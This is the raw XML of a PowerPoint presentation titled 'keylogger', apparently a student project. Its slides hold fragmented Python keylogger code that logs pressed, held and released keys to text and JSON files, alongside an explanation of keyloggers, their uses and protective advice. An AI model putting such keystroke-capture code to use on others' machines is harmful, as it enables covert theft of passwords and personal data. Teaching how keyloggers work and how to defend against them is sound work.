                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w+") as keys:</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keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key)</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</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with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>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wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_log</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key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</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).encode()</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key_log.write</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key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>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 keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    if flag == False:</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keys_used.append</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{'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38966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1C5008-417F-BB1D-66B0-2078BDA200DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="980661" y="265043"/>
            <a:ext cx="10787269" cy="6463308"/>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      )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        flag = True</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    if flag == True:</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keys_used.append</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{'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        )</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generate_json_file</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>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 keys</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keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    )</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    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</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generate_json_file</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keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</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    keys = keys + str(key)</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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</a:t>
            </a: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1282363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infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="16c05727-aa75-4e4a-9b5f-8a80a1165891"/>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term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1550</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>131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Bodoni MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Crop</vt:lpstr>
      <vt:lpstr>keylogger</vt:lpstr>
      <vt:lpstr>Outline: </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Problem Statement</vt:lpstr>
      <vt:lpstr>Explanation of Keylogger</vt:lpstr>
      <vt:lpstr>  4. Transmission of data: Some keyloggers are programmed to periodically send this log to a remote location, allowing whoever installed the keylogger to access the information remotely.    There are both legitimate and malicious uses for keyloggers. Legitimate uses include monitoring children's online activities or tracking employee computer usage. However, keyloggers can also be used by hackers or malicious software to steal sensitive information such as passwords, credit card numbers, and other personal data.    To protect yourself from malicious keyloggers, it's essential to have up-to-date antivirus software, avoid downloading software from untrusted sources, and be cautious of clicking on links or downloading attachments from suspicious emails or websites. </vt:lpstr>
      <vt:lpstr>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2024-04-04T05:49:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-09T19:57:44Z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